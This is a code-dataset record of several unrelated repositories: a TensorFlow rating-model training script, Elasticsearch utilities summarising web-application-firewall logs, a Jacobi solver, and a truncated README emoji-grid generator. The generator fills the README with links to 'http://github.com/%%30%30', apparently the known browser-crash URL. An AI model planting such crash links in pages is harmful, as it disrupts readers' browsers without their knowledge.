2a4f06bbe80fc25b36b4ad5e17376a21f8e756b9 | a38408a62efce0490284cc0866b3880b0e7fcb64 | /main.py | 2bc20f000be2133357e46d88473ec2ef0ff8d20a | [] | no_license | xiaoleiHou214/KDFM | fe033345f220b0ed3914e7bfac214559b43f2a5e | 8858fd750b77cbd803a38dea5604bcc788930d8f | refs/heads/master | 2021-10-22T04:28:38.735400 | 2019-03-08T02:29:06 | 2019-03-08T02:29:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,537 | py | import os
import numpy as np
import pandas as pd
import tensorflow as tf
from sklearn.metrics import make_scorer
from sklearn.model_selection import KFold,StratifiedKFold
from DataReader import FeatureDictionary, DataParser
from matplotlib import pyplot as plt
import codecs
from collections import defaultdict
import config
from KDFM import DeepAFM
from metrics import gini_norm, mse_norm, mse
def load_data():
dfTrain = pd.read_csv(config.TRAIN_FILE)
dfTest = pd.read_csv(config.TEST_FILE)
dfTrain.drop(config.TEXT_COLS, axis=1, inplace=True)
dfTest.drop(config.TEXT_COLS, axis=1, inplace=True)
cols = [c for c in dfTrain.columns if c not in ['review_ratting']]
cols = [c for c in cols if (not c in config.IGNORE_COLS)]
X_train = dfTrain[cols].values
y_train = dfTrain['review_ratting'].values
X_test = dfTest[cols].values
y_test = dfTest['review_ratting'].values
# Xm_train = xmTrain[xm_cols].values
# Xm_test = xmTest[xm_cols].values
return dfTrain, dfTest, X_train, y_train, X_test, y_test
def read_text_data(filename, word2idx, sequence_len):
unknown_id = word2idx.get("UNKNOWN", 0)
data_x, data_mask = [], []
try:
file = pd.read_csv(filename, sep=',')
for row in range(len(file)):
user_review = file['user_review'][row].strip().split(" ")
app_review = file['app_review'][row].strip().split(" ")
description = file['description'][row].strip().split(" ")
user_sent_idx = [word2idx.get(word.strip(), unknown_id) for word in user_review[:-1]]
app_sent_idx = [word2idx.get(word.strip(), unknown_id) for word in app_review[:-1]]
des_sent_idx = [word2idx.get(word.strip(), unknown_id) for word in description[:-1]]
# padding
pad_idx = word2idx.get("<a>", unknown_id)
ux, umask = np.ones(sequence_len, np.int32) * pad_idx, np.zeros(sequence_len, np.int32)
ax, amask = np.ones(sequence_len, np.int32) * pad_idx, np.zeros(sequence_len, np.int32)
dx, dmask = np.ones(sequence_len, np.int32) * pad_idx, np.zeros(sequence_len, np.int32)
if len(user_sent_idx) < sequence_len:
ux[:len(user_sent_idx)] = user_sent_idx
umask[:len(user_sent_idx)] = 1
else:
ux = user_sent_idx[:sequence_len]
umask[:] = 1
if len(app_sent_idx) < sequence_len:
ax[:len(app_sent_idx)] = app_sent_idx
amask[:len(app_sent_idx)] = 1
else:
ax = app_sent_idx[:sequence_len]
amask[:] = 1
if len(des_sent_idx) < sequence_len:
dx[:len(des_sent_idx)] = des_sent_idx
dmask[:len(des_sent_idx)] = 1
else:
dx = des_sent_idx[:sequence_len]
dmask[:] = 1
temp = []
temp_mask = []
temp.append(ux)
temp.append(ax)
temp.append(dx)
data_x.append(temp)
temp_mask.append(umask)
temp_mask.append(amask)
temp_mask.append(dmask)
data_mask.append(temp_mask)
except Exception as e:
print("load file Exception," + e)
return data_x, data_mask
def build_vocab(filename):
word2idx, idx2word = defaultdict(), defaultdict()
try:
with codecs.open(filename, mode="r", encoding="utf-8") as rf:
for line in rf.readlines():
items = line.strip().split(" ")
if len(items) != 2:
continue # 跳出本次循环
word_id = int(items[0].strip()) # strip() 用于移除字符串头尾指定的字符
word = items[1].strip()
idx2word[word_id] = word # key:word_id value: word
word2idx[word] = word_id # key: word value: word_id
print("build_vocab finish")
rf.close()
word2idx["UNKNOWN"] = len(idx2word) # word2idx key:UNKNOWN 中放的 value:idx2word的长度
idx2word[len(idx2word)] = "UNKNOWN" # idx2word key: idx2word的长度 中放的 UNKNOWN
word2idx["<a>"] = len(idx2word)
idx2word[len(idx2word)] = "<a>"
except Exception as e:
print(e)
return word2idx, idx2word
def load_embedding(embedding_size, word2idx=None, filename=None):
if filename is None and word2idx is not None:
return load_embedding_random_init(word2idx, embedding_size)
else:
return load_embedding_from_file(filename)
def load_embedding_random_init(word2idx, embedding_size):
embeddings=[]
for word, idx in word2idx.items():
vec = [0.01 for i in range(embedding_size)]
embeddings.append(vec)
return np.array(embeddings, dtype="float32")
def load_embedding_from_file(embedding_file):
word2vec_embeddings = np.array([[float(v) for v in line.strip().split(' ')] for line in open(embedding_file).readlines()], dtype=np.float32)
embedding_size = word2vec_embeddings.shape[1]
unknown_padding_embedding = np.random.normal(0, 0.1, (2,embedding_size))
embeddings = np.append(word2vec_embeddings, unknown_padding_embedding.astype(np.float32), axis=0)
return embeddings
def run_base_model_nfm(dfTrain, dfTest, folds, kdfm_params):
fd = FeatureDictionary(dfTrain=dfTrain,
dfTest=dfTest,
numeric_cols=config.NUMERIC_COLS,
ignore_cols=config.IGNORE_COLS,
xm_cols=config.XM_COLS)
data_parser = DataParser(feat_dict=fd)
# 新添
word2idx, idx2word = build_vocab(config.word_file)
# Xi_train :列的序号
# Xv_train :列的对应的值
Xi_train, Xv_train, y_train = data_parser.parse(df=dfTrain)
Xt_train, Xm_train = read_text_data(config.TRAIN_FILE, word2idx, config.num_unroll_steps) # read data TODO:config 与 pnn_params
Xi_test, Xv_test, y_test = data_parser.parse(df=dfTest)
Xt_test, Xm_test = read_text_data(config.TEST_FILE, word2idx, config.num_unroll_steps)
kdfm_params['feature_size_one_hot'] = fd.feat_dim
kdfm_params['word_embeddings'] = load_embedding(config.embedding_size, filename=config.embedding_file) # read data
#TODO:change
y_train_meta = np.zeros((dfTrain.shape[0], 1), dtype=float)
y_test_meta = np.zeros((dfTest.shape[0], 1), dtype=float)
results_cv = np.zeros(len(folds), dtype=float)
results_epoch_train = np.zeros((len(folds), kdfm_params['epoch']), dtype=float)
results_epoch_valid = np.zeros((len(folds), kdfm_params['epoch']), dtype=float)
results_epoch_train_mae = np.zeros((len(folds), kdfm_params['epoch']), dtype=float)
results_epoch_valid_mae = np.zeros((len(folds), kdfm_params['epoch']), dtype=float)
def _get(x, l): return [x[i] for i in l]
for i, (train_idx, valid_idx) in enumerate(folds):
Xi_train_, Xv_train_, y_train_, Xt_train_, Xm_train_ = \
_get(Xi_train, train_idx), _get(Xv_train, train_idx), _get(y_train, train_idx), \
_get(Xt_train, train_idx), _get(Xm_train, train_idx)
Xi_valid_, Xv_valid_, y_valid_, Xt_valid_, Xm_valid_ = \
_get(Xi_train, valid_idx), _get(Xv_train, valid_idx), _get(y_train, valid_idx), \
_get(Xt_train, valid_idx), _get(Xm_train, valid_idx)
kdfm = DeepAFM(**kdfm_params)
Xim_train_ = []
Xvm_train_ = []
Xim_valid_ = []
Xvm_vaild_ = []
Xim_test = []
Xvm_test = []
kdfm.fit(Xi_train_, Xv_train_, Xim_train_, Xvm_train_, Xt_train_, y_train_,
Xi_valid_, Xv_valid_, Xim_valid_, Xvm_vaild_, Xt_valid_,y_valid_)
y_train_meta[valid_idx, 0] = kdfm.predict(Xi_valid_, Xv_valid_, Xim_valid_, Xvm_vaild_, Xt_valid_)
y_test_meta[:, 0] += kdfm.predict(Xi_test, Xv_test, Xim_test, Xvm_test, Xt_test)
results_cv[i] = mse_norm(y_valid_, y_train_meta[valid_idx])
results_epoch_train[i] = kdfm.train_result
results_epoch_valid[i] = kdfm.valid_result
results_epoch_train_mae[i] = kdfm.mae_train_result
results_epoch_valid_mae[i] = kdfm.mae_valid_result
y_test_meta /= float(len(folds))
mse_test = mse(y_test, y_test_meta)
# save result
if kdfm_params["use_afm"] and kdfm_params["use_deep"]:
clf_str = "KDFM"
elif kdfm_params["use_afm"]:
clf_str = "AFM"
elif kdfm_params["use_deep"]:
clf_str = "DNN"
print("%s: %.5f (%.5f)" % (clf_str, results_cv.mean(), results_cv.std()))
filename = "%s_Mean%.5f_Std%.5f.csv" % (clf_str, results_cv.mean(), results_cv.std())
_make_submission(y_test, y_test_meta, mse_test, filename)
_plot_fig(results_epoch_train, results_epoch_valid, clf_str+'mse', "mse")
_plot_fig(results_epoch_train_mae, results_epoch_valid_mae, clf_str+'mae', "mae")
def _make_submission(target, y_pred, mse_test, filename="submission.csv"):
pd.DataFrame({"id": range(len(target)), "target": target, "predict": y_pred.flatten(), "mse": mse_test}).to_csv(
os.path.join(config.SUB_DIR, filename), index=False, float_format="%.5f")
def _make_kdfm_params(key, value, filename="kdfm_params.csv"):
pd.DataFrame({"key": key, "value": value}).to_csv(
os.path.join(config.SUB_DIR, filename), index=False, float_format="%.5f")
def _plot_fig(train_results, valid_results, model_name, algor):
colors = ["red", "blue", "green"]
xs = np.arange(1, train_results.shape[1]+1)
plt.figure()
legends = []
for i in range(train_results.shape[0]):
plt.plot(xs, train_results[i], color=colors[i], linestyle="solid", marker="o")
plt.plot(xs, valid_results[i], color=colors[i], linestyle="dashed", marker="o")
legends.append("train-%d"%(i+1))
legends.append("valid-%d"%(i+1))
plt.xlabel("Epoch")
if algor == 'mae':
plt.ylabel("mae")
if algor == 'mse':
plt.ylabel("mse")
plt.title("%s"%model_name)
plt.legend(legends)
plt.savefig("fig/%s.png"%model_name)
plt.close()
# TODO: lack of feature_size & word_embeddings
kdfm_params = {
"use_afm": True,
"use_deep": True,
#"field_size": 6,
"feature_size_one_hot": 1,
"field_size_one_hot": 3,
"feature_size_multi_value": 0,
"field_size_multi_value": 0,
"embedding_size": 8,
"attention_size": 10,
"deep_layers": [32, 32, 32],
"dropout_deep": [0.5, 0.5, 0.5, 0.5],
"deep_layer_activation": tf.nn.relu,
"epoch": 30,
"batch_size": 128,
"learning_rate": 0.001,
"optimizer": "adam",
"random_seed": config.RANDOM_SEED,
"l2_reg": 0.1,
"rnn_size": 100,
"num_rnn_layers": 1,
"keep_lstm": 0.5,
"num_unroll_steps": 100, # 句子长度
"verbose": True,
"topics": 1
}
# load data
dfTrain, dfTest, X_train, y_train, X_test, y_test = load_data()
# folds
# TODO: StratifiedKFold 修改为 KFold
folds = list(StratifiedKFold(n_splits=config.NUM_SPLITS, shuffle=True,
random_state=config.RANDOM_SEED).split(X_train, y_train))
run_base_model_nfm(dfTrain, dfTest, folds, kdfm_params)
# ------------------ FM Model ------------------
afm_params = kdfm_params.copy()
afm_params["use_deep"] = False
run_base_model_nfm(dfTrain, dfTest, folds, afm_params)
# ------------------ DNN Model ------------------
dnn_params = kdfm_params.copy()
dnn_params["use_afm"] = False
run_base_model_nfm(dfTrain, dfTest, folds, dnn_params)
| [
"ixiaocn@163.com"
] | ixiaocn@163.com |
95149da7db451c97b4b863918bb4c788b0f439f4 | 4bfe441ce7b3da39304b045bb6ceb6f6efb21b25 | /project_html/app_fuzhou/views_utils/utils_waf.py | ec8119be03c135aec53281a03e28621a9bec55cd | [] | no_license | DearYuanYuan/8lab_react_project_html | d7046a4ed7da830f75faa790148338cd8a5c7f1f | 9133d9bd5e04ee70492b648f6df448fab80f28c8 | refs/heads/master | 2020-03-23T21:17:07.442492 | 2018-07-24T03:19:43 | 2018-07-24T03:19:43 | 142,095,449 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 21,299 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
本例用来为waf_view提供调用,功能从ElasticSearch中读取对应wafLog
Author 杨泽
Date 2017-4-26
依赖于logstash配置:
filter{
else if "wafLog" in [tags] {
grok {
match => {
"message" => "^X-Forwarded-For: %{DATA:XForwardedFor}$"
}
}
grok {
match => {
"message" => "---[0-9a-zA-Z]{8}---A--\n\[%{DATA:date}]"
}
}
grok {
match => {
"message" => "Referer: %{DATA:Referer}$"
}
}
date {
match => ["date", "dd/MMM/yyyy:HH:mm:ss Z"]
}
mutate {
replace => {
"model" => "defense"
}
}
}
}
update: 2017-7-7 by YangZe
时区!TIME_ZONE!
wafLog的日志时间为: UTC时间,转换为@timestamp时,因为带有时区信息,因此时区没变
统一从es中@timestamp取时间,且该时间为UTC
"""
import re
import datetime
import time
from elasticsearch import Elasticsearch, TransportError
from app_fuzhou.views_utils.localconfig import JsonConfiguration
from app_fuzhou.views_utils.global_config import GlobalConf
from app_fuzhou.views_utils.logger import logger
from app_fuzhou.views_utils.service.queryip.GeoLite2_Instance import IpToCoordinate
LOCAL_CONFIG = JsonConfiguration() # share.json
WAF_INDEX = LOCAL_CONFIG.waf_index
def get_waf_log(attack_type, page, pagesize):
"""
从ES获取flag类型的wafLog日志,从中提取出攻击时间/源IP/目的IP/攻击工具以及攻击记录总数,并返回
:param attack_type: 攻击类型
:param page: 页数,>=1
:param pagesize: 每页数据大小
:return:
"""
try:
results, log_sum = get_waf_log_from_es(attack_type, page, pagesize) # 从es中读取wafLog
logs = handle_get_waf_log(results, attack_type) # 处理wafLog,攻击信息
return logs, log_sum
except Exception as e:
logger.error(e)
return [], 0
def get_waf_log_from_es(attack_type, page=1, pagesize=50, time_filter=None, sort="desc"):
"""
从ES获取WafLog
:param attack_type: waf攻击类型
:param page: 第几页
:param pagesize: 每页多少条
:param time_filter: 时间过滤器
:param sort: 排序
:return:
"""
global_config = GlobalConf()
es = Elasticsearch(LOCAL_CONFIG.es_server_ip_port)
body = {
"query": {
"bool": {
"must": [
{"match_phrase": {"_type": "wafLog"}}, # 必须匹配规则
],
"should": [],
"minimum_should_match": 1, # 后面加的message匹配规需要至少匹配一个
# "filter": {"range": {"@timestamp": {"gte": "now-3d", "lte": "now"}}} # 时间过滤器
}
},
"from": (page-1)*pagesize,
"size": pagesize,
}
if sort == "desc" or sort == "asc":
body["sort"] = {"@timestamp": sort}
if time_filter:
body["query"]["bool"]['filter'] = time_filter
# 首先解析flag,从配置文件查找flag对应字段
if attack_type == "web-attack": # web-attack
rules = global_config.RULES['EXPERIMENTAL_RULES']
elif attack_type == "sensitive-data-tracking": # sensitive-data-tracking
rules = global_config.RULES['OPTIONAL_RULES']
elif attack_type == "identification-error": # identification-error
rules = global_config.RULES['SLR_RULES']
elif attack_type == "dos-attack": # dos-attack
rules = global_config.RULES['DOS_RULES']
elif attack_type == "http-defense": # http-defense
rules = global_config.RULES['BASE_RULES'] # 包含http规则
except_rules = [] # 或者不包含其他的
except_rules += global_config.RULES['EXPERIMENTAL_RULES']
except_rules += global_config.RULES['OPTIONAL_RULES']
except_rules += global_config.RULES['SLR_RULES']
except_rules += global_config.RULES['DOS_RULES']
must_not_list = []
for rule in except_rules: # 把must_not匹配规则加入到body中
must_not_list.append({"match_phrase": {"message": rule}})
body["query"]["bool"]["should"].append({"bool": {"must_not": must_not_list}})
else:
return [], 0
for rule in rules: # 把message匹配规则加入到body中
body["query"]["bool"]["should"].append({"match_phrase": {"message": rule}})
"""
for host in hosts: # 生成索引列表
index_list.append(index+host['ip'])
"""
try:
result = es.search(index=WAF_INDEX, body=body, ignore_unavailable=True) # 从es中读取
except Exception as e:
logger.error(e)
return [], 0
# 至此从es上获得了数据
return result['hits']['hits'], result['hits']['total']
def get_waf_logs_timestamp_count(time_interval=10):
"""
按秒数统计日志,即每秒出现多少条日志
:param time_interval: 时间过滤,最近time_interval秒内
:return:
"""
result_dict = {"data": []}
es = Elasticsearch(LOCAL_CONFIG.es_server_ip_port) # es实例
now_interval, now = get_range_of_last_interval(time_interval)
try:
body = {
"query": {
"range": {
"@timestamp": {
"gte": now_interval,
"lte": now
}
},
}
}
results = es.search(index=WAF_INDEX, doc_type="wafLog", body=body,
ignore_unavailable=True) # 访问一次ES
result_dict["data"] = results["hits"]["hits"]
except Exception as e:
logger.error(e)
finally:
return result_dict
def handle_get_waf_log(results, attack_type):
"""
处理wafLog,记录waf攻击的攻击源,攻击目标,攻击时间,攻击工具,攻击类型信息
:param results:
:param attack_type: 攻击类型
:return:
"""
logs = []
time_delta = datetime.timedelta(hours=8)
for hit in results:
try:
log = {"inter_ip": hit['_source']['type'], # 攻击目标ip
"inter_time": (datetime.datetime.strptime(
hit["_source"]["@timestamp"], "%Y-%m-%dT%H:%M:%S.%fZ")
+ time_delta).strftime('%Y-%m-%d %H:%M:%S'),
"inter_source": hit['_source'].get('XForwardedFor', ''), # 攻击源ip
"inter_tool": hit['_source'].get('Referer', ''), # 攻击来源
"defend_type": attack_type} # 防御类型
logs.append(log)
except Exception as e:
logger.error(str(e))
logs.sort(key=lambda x: x["inter_time"], reverse=True) # 之前已经经过反序,这一步仍检测一次是否有乱序
return logs
def handle_get_waf_log_old(results, flag): # 旧代码
"""
处理wafLog,记录waf攻击的攻击源,攻击目标,攻击时间,攻击工具,攻击类型信息
:param results:
:param flag:
:return:
"""
head = re.compile(r"--.*-A--")
logs = []
time_delta = datetime.timedelta(hours=8)
for hit in results:
one_record = hit['_source']['message'].split('\n')
i = 0
# 进入每一条日志,重置log,并记录被攻击IP,该字段记录在es的type中
log = {"inter_ip": hit['_source']['type'], # 攻击目标ip
"inter_time": "Unknown", # 攻击时间
"inter_source": hit['_source'].get('XForwardedFor', ''), # 攻击源ip
"inter_tool": "Unknown_Tool", # 攻击工具
"defend_type": flag} # 防御类型
one_interception = False
while i < len(one_record):
line = one_record[i] # 每一行数据
if (not one_interception) and head.findall(line): # 正则表达式r"--.*-A--"
temp = one_record[i + 1].split()
_time = datetime.datetime.strptime(temp[0].strip("["),
'%d/%b/%Y:%H:%M:%S') + time_delta # UTC+8小时
log["inter_time"] = _time.strftime("%Y-%m-%d %X")
one_interception = True # 进入一条记录
i += 1 # 下一行数据已记录
elif line.find("Referer") != -1: # 如果找到Referer
log["inter_tool"] = line.split(":")[1] # 记录攻击工具
i += 1
logs.append(log)
logs.sort(key=lambda x: x["inter_time"], reverse=True) # 之前已经经过反序,这一步仍检测一次是否有乱序
return logs
def get_state_info_dict():
"""
分别搜索es中的wafLog中的日志总数,和带有Referer字段的wafLog的日志总数(即识别数)
:return: {识别数,未识别数}
"""
try:
hosts = LOCAL_CONFIG.client_audit_hosts
es = Elasticsearch(LOCAL_CONFIG.es_server_ip_port)
state_info_dict = {}
index_list = []
"""
for host in hosts: # 生成索引列表
index_list.append(index + host['ip'])
"""
# 首先在es中搜索各索引全部的wafLog记录
body = {"query": {"bool": {"must": [{"match_phrase": {"_type": "wafLog"}}]}}, "size": 0}
result = es.search(index=WAF_INDEX, body=body, ignore_unavailable=True) # 从es中读取
total_results = result['hits']['total']
# 首先在es中搜索各索引全部的wafLog记录中带有Referer字段的,update:带有model字段并值为defense的
body = {"query": {"bool": {"must": [{"match_phrase": {"_type": "wafLog"}},
{"match": {"model": "defense"}}]}}, "size": 0}
result = es.search(index=WAF_INDEX, body=body, ignore_unavailable=True) # 从es中读取
total_intercepted_results = result['hits']['total']
state_info_dict["intercepted"] = total_intercepted_results
state_info_dict["unrecognized"] = total_results - total_intercepted_results
return state_info_dict
except Exception as e:
logger.error(e)
return {"intercepted": 0, "unrecognized": 0}
def get_waf_log_aggregations_week():
"""
获取包括今天在内的7天里的每天的各个级别的日志的数量,5个级别*7天
获取各个级别日志总数
:return: week:{date:[],dos-attack:[],...},total: {dos-attack:0,....}
"""
days = []
today = datetime.date.today()
for _day in range(6, -1, -1): # 日子排序为从远到近
days.append((today - datetime.timedelta(days=_day)).strftime("%Y-%m-%d")) # 近7天
global_config = GlobalConf()
hosts = LOCAL_CONFIG.client_audit_hosts
es = Elasticsearch(LOCAL_CONFIG.es_server_ip_port)
index_list = []
"""
for host in hosts: # 生成索引列表
index_list.append(index + host['ip'])
"""
level_list = ["web-attack", "sensitive-data-tracking",
"identification-error", "dos-attack", "http-defense"]
week_aggr_dict = {'date': days}
total_count = {}
# 首先解析flag,从配置文件查找flag对应字段
for _level in level_list:
body = {
"query": {
"bool": {
"must": [
{"match_phrase": {"_type": "wafLog"}}, # 必须匹配规则
],
"should": [],
"minimum_should_match": 1, # 后面加的message匹配规需要至少匹配一个
}
},
"size": 0,
"aggs": { # 聚合
"week_history": {
"date_histogram": {
"field": "@timestamp", # 时间字段
"interval": "day", # 按天统计
"format": "yyyy-MM-dd",
"min_doc_count": 0,
"time_zone": "+08:00", # es默认时区是UTC,所以需要+8
"extended_bounds": {"min": days[0], "max": days[6]} # 范围为近7天内,包括今天
}
}
}
}
week_aggr_dict[_level] = []
if _level == "web-attack": # web-attack
rules = global_config.RULES['EXPERIMENTAL_RULES']
elif _level == "sensitive-data-tracking": # sensitive-data-tracking
rules = global_config.RULES['OPTIONAL_RULES']
elif _level == "identification-error": # identification-error
rules = global_config.RULES['SLR_RULES']
elif _level == "dos-attack": # dos-attack
rules = global_config.RULES['DOS_RULES']
else: # http-defense
rules = global_config.RULES['BASE_RULES'] # 匹配http规则
except_rules = [] # 或者不匹配其他任何
except_rules += global_config.RULES['EXPERIMENTAL_RULES']
except_rules += global_config.RULES['OPTIONAL_RULES']
except_rules += global_config.RULES['SLR_RULES']
except_rules += global_config.RULES['DOS_RULES']
must_not_list = []
body["query"]["bool"]["should"].append({"bool": {"must_not": must_not_list}})
for rule in except_rules: # 把message匹配规则加入到body中
must_not_list.append({"match_phrase": {"message": rule}})
for rule in rules: # 把message匹配规则加入到body中
body["query"]["bool"]["should"].append({"match_phrase": {"message": rule}})
try:
results = es.search(index=WAF_INDEX, body=body,
ignore_unavailable=True) # 从es中读取
total_count[_level] = results['hits']['total'] # 记录每种类型的总数
# 虽然,上面的聚合操作指定了只取最近7天,但其只能进行扩展,不能进行压缩,因此,下面的切片操作[-7:]是必须的!!
for _result in results['aggregations']['week_history']['buckets'][-7:]: # ES返回的聚合数据list有序,顺序为从小到大
week_aggr_dict[_level].append(_result['doc_count']) # 存入顺序为 按照日期 从小到大
# total_count[_level] = results['hits']['total'] # 记录每种类型的总数
except Exception as e:
logger.error(e)
if not week_aggr_dict[_level]: # 当索引不存在时,week_aggr_dict[_level]就是一个空列表,此时进行如下赋值
week_aggr_dict[_level] = [0, 0, 0, 0, 0, 0, 0]
return week_aggr_dict, total_count
def get_waf_log_aggregations_days():
"""
获取wafLog按天统计的日志数量
:return: {"date": [], "limit": 100, "count": []}
"""
days = [] # 近10天日期
count = [] # 近10天,每天的攻击总数
today = datetime.date.today()
early_day = today-datetime.timedelta(days=9)
for _day in range(9, -1, -1): # 日子排序为从远到近
days.append((today - datetime.timedelta(days=_day)).strftime("%m-%d")) # 近10天
hosts = LOCAL_CONFIG.client_audit_hosts
es = Elasticsearch(LOCAL_CONFIG.es_server_ip_port)
index_list = []
"""
for host in hosts: # 生成索引列表
index_list.append(index + host['ip'])
"""
body = {
"query": {
"bool": {
"must": [
{"match_phrase": {"_type": "wafLog"}}, # 必须匹配规则
],
}
},
"size": 0,
"aggs": { # 聚合
"week_history": {
"date_histogram": {
"field": "@timestamp", # 时间字段
"interval": "day", # 按天统计
"format": "yyyy-MM-dd",
"min_doc_count": 0,
"time_zone": "+08:00", # es默认时区是UTC,所以需要+8
"extended_bounds": {"min": str(early_day), "max": str(today)} # 范围为近10天内,包括今天
}
}
}
}
try:
results = es.search(index=WAF_INDEX, body=body, ignore_unavailable=True) # 从es中读取
# 虽然,上面的聚合操作指定了只取最近10天,但其只能进行扩展,不能进行压缩,因此,下面的切片操作[-10:]是必须的!!
for _result in results['aggregations']['week_history']['buckets'][-10:]: # ES返回的聚合数据list有序,顺序为按照日期从小到大
count.append(_result['doc_count'])
except Exception as e:
logger.error(e)
if not count: # 当索引不存在时,count就是一个空列表,此时进行如下赋值
count = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
return {"date": days, "limit": 100, "count": count}
def get_waf_log_aggregations_city():
"""
获取攻击源城市的统计
根据waf的XFF字段记录的ip做统计,然后把ip转换为城市名
:return: {"name": city_list, "count": attack_count}
"""
es = Elasticsearch(LOCAL_CONFIG.es_server_ip_port)
body = {
"query": {
"bool": {
"must": [
{"match_phrase": {"_type": "wafLog"}}, # 必须匹配规则
],
}
},
"size": 0,
"aggs": { # 聚合
"source_ip": { # 按照XForwardedFor字段统计ip
"terms": {
"field": "XForwardedFor" # 结果默认count从大到小排序
}
}
}
}
ip_list = []
ip_count_list = []
try:
# 从es中读取
results = es.search(index=WAF_INDEX, body=body, ignore_unavailable=True)
# 按照每个桶内的文档数 降序排序,包含文档数最多的桶 排在最前面
for _result in results['aggregations']['source_ip']['buckets']:
ip_list.append(_result['key'].strip())
ip_count_list.append(int(_result['doc_count']))
except TransportError as e: # 在初始默认情况下,自定义的字段XForwardedFor,es默认不可搜索,需要开启
logger.error(e)
post_data = {"properties": {"XForwardedFor": {"type": "text", "fielddata": "true"}}} # 开启XForwardedFor搜索
es.indices.put_mapping(index=WAF_INDEX, doc_type="wafLog", body=post_data, ignore_unavailable=True)
results = es.search(index=WAF_INDEX, body=body, ignore_unavailable=True) # 再次从es中读取
for _result in results['aggregations']['source_ip']['buckets']: # 按照每个桶内的文档数 降序排序,包含文档数最多的桶 排在最前面
ip_list.append(_result['key'].strip())
ip_count_list.append(int(_result['doc_count']))
logger.info("The error above has been fixed")
except Exception as e:
logger.error(e)
ip_geo_resolver = IpToCoordinate() # 由IP解析地理坐标的工具类
i = 0
city_list = []
attack_count = []
for _ip in ip_list:
if len(city_list) >= 9:
break
try: # 如果ip格式错误或者没有找到结果,则不记录
ip_information = ip_geo_resolver.get_information_by_ip(_ip) # 获取攻击源IP的信息
print('\n\nip_information=', ip_information)
city_name = ip_information["city"]["names"]["zh-CN"] # 记录城市中文名
if ip_information["country"]["names"]["en"] != "China": # 如果为外国城市,再加上英文名
city_name += " " + ip_information["city"]["names"]["en"]
city_list.append(city_name)
attack_count.append(ip_count_list[i])
except ValueError as e: # 若ip不存在(错误),将抛出ValueError异常
logger.error("wrong ip:" + str(e))
except KeyError as e: # 若字典中的某个键不存在,将抛出KeyError异常
logger.error(str(e))
i += 1
diff = sum(ip_count_list) - sum(attack_count) # 如果已记录的攻击数和总数不一样
if diff != 0:
city_list.append("其他") # 则添加一个"其他",把差额付给他
attack_count.append(diff)
if len(city_list) == 0: # 如果没数据,前端会不显示图形,因此添加一个"无"
city_list.append("无") # 则添加一个"无"
attack_count.append(1) # 值为1
return {"name": city_list, "count": attack_count}
def get_range_of_last_interval(interval=10):
"""
获取当前时间往前推 interval 时间间隔的时间
:param interval:
:return:
"""
now = datetime.datetime.now() - datetime.timedelta(hours=8) # utc时间 小时需要减8
now_interval = now - datetime.timedelta(seconds=interval - 1)
now = now.strftime('%Y-%m-%d') + "T" + now.strftime('%H:%M:%S') + ".000Z"
now_interval = now_interval.strftime('%Y-%m-%d') + "T" + now_interval.strftime('%H:%M:%S') + ".000Z"
return now_interval, now
def get_seconds_of_interval(interval=10):
"""
获取当前时间往前推 interval 时间间隔的时间,单位为秒
:param interval:
:return:
"""
seconds = []
now = time.time()
for i in range(interval):
t = now - (9-i) # timestamp加减单位以 秒 为单位
seconds.append(time.ctime(t)[11:19])
return seconds
def get_datas_of_interval(interval=10):
datas = []
for i in range(interval):
datas.append(0)
return datas
| [
"jorelin0924@gmail.com"
] | jorelin0924@gmail.com |
6269ee728324127ee62aa78090ebac112614e251 | 80873f43da689b46bdf42d850365d53899c05242 | /Jacobi_GaussSeidel/jacobi.py | 23b7729249f1e7311c73700930c6161c99ef6b86 | [] | no_license | dhimoyee-sumatra/scientific_computing | 30b4146c8bc2fec7a39e5cc6a95081b80bacc7c0 | cd489c26f390c75975c5cd4cf260158832bf6d42 | refs/heads/master | 2020-03-08T01:51:48.441229 | 2018-04-03T03:02:11 | 2018-04-03T03:02:11 | 127,842,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | import numpy as np
import matplotlib.pyplot as plt
import scipy.linalg as scp
def jacobi(a, b, xc):
tol = .5e-6
n= len(b)
d=[a[i, i] for i in range(n)]
r= a - np.diag(d)
x= np.zeros((n,1))
bb= np.reshape(b, (n,1))
dd= np.reshape(d, (n,1))
k=0
while(np.abs(xc-x).max()> tol):
x=(bb-np.dot(r,x))/dd
k=k+1
print k
backErrMat = b - a.dot(x)
backErr = np.abs(backErrMat).max()
print "Backward Error: ", backErr
return x
def makeMatrix(n):
d0=[3 for i in range(n)]
d1=[-1 for i in range (n-1)]
d_1=[-1 for i in range (n-1)]
D= np.diag(d0, 0)+np.diag(d1, 1)+ np.diag(d_1, -1)
return D
def makeVector(n):
b= np.zeros((n,1))
b[0]=2; b[1:n-1]=1; b[n-1]=2
return b
a1= makeMatrix(100)
b1= makeVector(100)
x1= np.ones((100,1))
print jacobi(a1, b1, x1)
| [
"dhimo22s@mtholyoke.edu"
] | dhimo22s@mtholyoke.edu |
d412b8ebe52fafa4e127bd0961f02f1ae6a5f0da | eaee84243b3ea7ee71cdbf5e3d6f471d1fca4ee1 | /src/game.py | 3080b39293b7b726d0ebc3ae99108f194647f8cf | [] | no_license | busterroni/3030 | 4b608f4a69a7d170c267d4370d88121d1a412d30 | 8ed77beb4565d813e1d4aa602c84f964170bf2c7 | refs/heads/master | 2021-01-15T23:20:56.436694 | 2015-09-20T23:25:54 | 2015-09-20T23:27:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,283 | py | #!/usr/bin/env python
# coding: utf-8
SEP = '\n<!-- GAME -->\n'
def get_between_sep(fname, sep):
with open(fname, 'rb') as f:
contents = f.read()
parts = contents.split(sep)
assert len(parts) == 3
return parts
table = {
' ': '🍭',
'.': '[🌲][dead]',
}
def make_game_iter(iter):
for in_line in iter:
in_line = in_line.rstrip('\n')
out_line = ' '.join(table[char] for char in in_line)
yield out_line + ' '
yield '[dead]: http://github.com/%%30%30'
# yield table['_'] + ': http://github.com/'
def make_game(fname):
return '\n'.join(make_game_iter(open(fname, 'rb')))
def main(game_fname, doc_fname):
doc_parts = get_between_sep(doc_fname, SEP)
game = make_game(game_fname)
doc_parts[1] = game
contents = SEP.join(doc_parts)
with open(doc_fname, 'wb') as f:
f.write(contents)
return 0
##
class ProgramError(Exception):
pass
def run():
from sys import argv, stderr
try:
exit(main(*argv[1:]) or 0)
